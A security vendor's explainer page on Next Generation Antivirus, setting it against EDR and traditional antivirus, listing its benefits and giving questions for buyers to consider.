What is Next Generation Antivirus (NGAV)?

Next Generation Antivirus is considered a step forward in antivirus (AV) solutions capabilities, and leverages known, signature-based prevention techniques in combination with extended detection and response (XDR) capabilities that incorporate artificial intelligence (AI) and/or machine learning (ML). By leveraging advanced analytics to correlate alerts from multiple telemetry sources, NGAV quickly identifies actionable threat intelligence to anticipate and prevent threats faster. 

NGAV is deployed in the form of cloud-based software that has a lighter impact on systems and endpoints, and is increasingly the more common type of AV in organizations and enterprises.

NGAV vs. Endpoint Detection and Response (EDR)

In a sense, when XDR and NGAV work together, they are both protecting the network perimeter and extending threat-detection techniques beyond it. EDR happens at the endpoint that lies inside of that security perimeter. Bad actors could still find a way to an endpoint like a phone or laptop, so a good EDR solution is a last line of defense.

NGAV vs. Anti-malware

Again, it's the broad versus the specific here. As mentioned above, a modern NGAV solution is designed to leverage advanced analytics to secure, anticipate, and defend against threats at and beyond the network perimeter. Anti-malware solutions are primarily designed to scan individual systems for malware built to bypass security controls.

How Does NGAV Work? 

NGAV works by detecting and preventing malware and fileless attacks. It leverages pre-execution methodologies to protect against tactics, techniques, and procedures (TTPs) and malicious behavior used with purpose by bad actors or unwittingly by someone who is properly credentialed. Let’s take a closer look at how an NGAV solution accomplishes its detection and prevention goals:

  • Memory injection prevention blocks attempts by fileless threats so that it can avoid execution of code from the file system. Memory injection prevention can stop injection of and hide malicious code that may occur during a legitimate process. 
  • Malicious documents prevention breaks or otherwise disarms malicious documents that try to abuse features such as maros, scripts, and built-in tools. By doing this, it allows users to benefit from the full capabilities of modern applications and worry less about infections. 
  • Living-off-the-land prevention interferes with attempts to misuse system-native tools that would otherwise cause damage without the need to deploy classic forms of malware. Threats aren't able to "trampoline" off of these native tools to infect the endpoint. 
  • Operating system credential dumping protection blocks deception technology like credential-theft attempts. 

Providers of NGAV solutions and services typically design the technology to be rapidly launched and operating in such a way as not to hinder performance of network systems or endpoints. 

NGAV vs. Traditional AV

When we talk about NGAV, those last two letters still loom large within culture. The term “antivirus” has been a part of computer-using society for decades, so it bears asking the question: What exactly are the differences between modern NGAV and traditional perceptions of AV?

AV primarily focuses on protecting the endpoint and/or quickly removing an affected device that may be part of a larger critical infrastructure, thus causing potentially larger disruption among unaffected devices. This could lead to a business enduring significant financial and reputational damage.

NGAV moves beyond these traditional AV processes, blocking diverse attacks – including fileless malware – across the entire endpoint ecosystem. NGAV’s main goal is to detect and prevent attacks from reaching critical endpoints all over the network. Not only that: Via ML and AI learning, it can help put a stop to evasive actions. More detection technology won’t solve the problem of malware and other threats, rather it’s smarter detection focused on prevention that will put attackers on the defensive.

One last key difference is focused on the previously mentioned concept of learning. Traditional AV can be heavy on an endpoint, meaning it doesn’t really have the capability to adapt to a system’s unique behaviors – it is what it is, and that’s all it will ever be. NGAV, on the other hand, can learn from past behaviors of the endpoints, systems, and networks on which it’s installed. This is why it’s so adept at detecting evasive actions and blocking threats much earlier in the killchain than was heretofore possible.

What are the Benefits of NGAV? 

The benefits of NGAV are numerous compared to traditional AV, and can accelerate an organization's network detection and response (NDR) program.

Prevent Threats Earlier 

For businesses and security organizations to stand against modern threats, they must attempt to outpace bad-actor use of NGAV-thwarting technology. This includes blocking known and unknown threats sooner in the killchain, cutting off endpoint and deep-system access, or even preventing network access entirely. Traditional AV typically uses signature-based detection methods whereas NGAV leverages a combination of signature-based detection, AI, and ML to surface the TTPs used by today’s attackers.

Gain Endpoint Visibility 

As previously mentioned, ML and AI impart NGAV solutions with the ability to adapt to specific behaviors in systems they’re tasked with protecting. This helps analysts to gain a deeper understanding of their endpoints and network systems so they can defend against threats and design better protections based on telemetry that could indicate impending attacks.

See Results Fast

NGAV solutions are generally designed to be lightweight, add-on technology that won’t slow down system operations – and therefore security personnel productivity. It typically has a small footprint that can deploy quickly, drive key insights, and enable faster mean-time-to-respond (MTTR) with actions like automated-asset and process containment.

Evolve Traditional AV 

With lower operational costs, more efficient threat intelligence and detection capabilities, and comprehensive coverage, NGAV solutions are typically ideal for security professionals looking to further consolidate across the tech stack. As a value-add for an existing detection and response (D&R) solution an organization may already have, NGAV can accelerate the breaking down of silos between security practices. This can be a productivity, efficiency, and growth driver for security operations centers (SOCs) that may already be stretched thin.

NGAV Solution: Questions to Consider

As with any solution – especially shopping for one within a category that has the buzzy phrase “next gen” in its name – there are many options and potential vendors. So, it’s best to know how to find one that can tailor an NGAV solution to your unique environment.

  • How are you using your current AV solution(s)? The heart of this question would center on strategy. Is there a system or plan in place for how AV is deployed, and what exactly is it built to protect? If a standard enterprise AV is not properly designed to protect the system on which it's running, then your organization may need to recalibrate. 
  • How much maintenance goes into AV on each endpoint? As covered extensively on this page, a modern NGAV solution goes beyond the endpoint to get ahead of attacks before they reach individual systems. Maintaining AV running on multiple endpoints (hundreds? thousands?) doesn’t take advantage of NGAV predictive efficiencies enabled by AI and ML.
  • How much visibility do you have into current endpoint events? A competent team is going to have a good amount of visibility into their network and the endpoints on it. The question is, could you benefit from more and leverage the insights that visibility brings to better plan and proactively defend? 
  • How important are lower operational costs to your CISO? The answer here may seem obvious, but holistic solutions that break down silos and consolidate capabilities are increasingly contributing to an uptick in productivity and lower overall costs versus maintaining multi-provider products. While those individual products may be effective, they can create workforce lag when looked at in tandem with other bespoke solutions under an organization’s umbrella.
  • What is the current state of your cloud operations/security? Keep in mind that the ideal state to deploy an NGAV solution is one where robust cloud-operations are currently in place. This will make it possible to get the solution up and running in near-real time and begin seeing benefits almost immediately.

Read More

Antivirus: Latest Rapid7 Blog Posts

Rapid7 Research: Encapsulating Antivirus (AV) Evasion Techniques in Metasploit Framework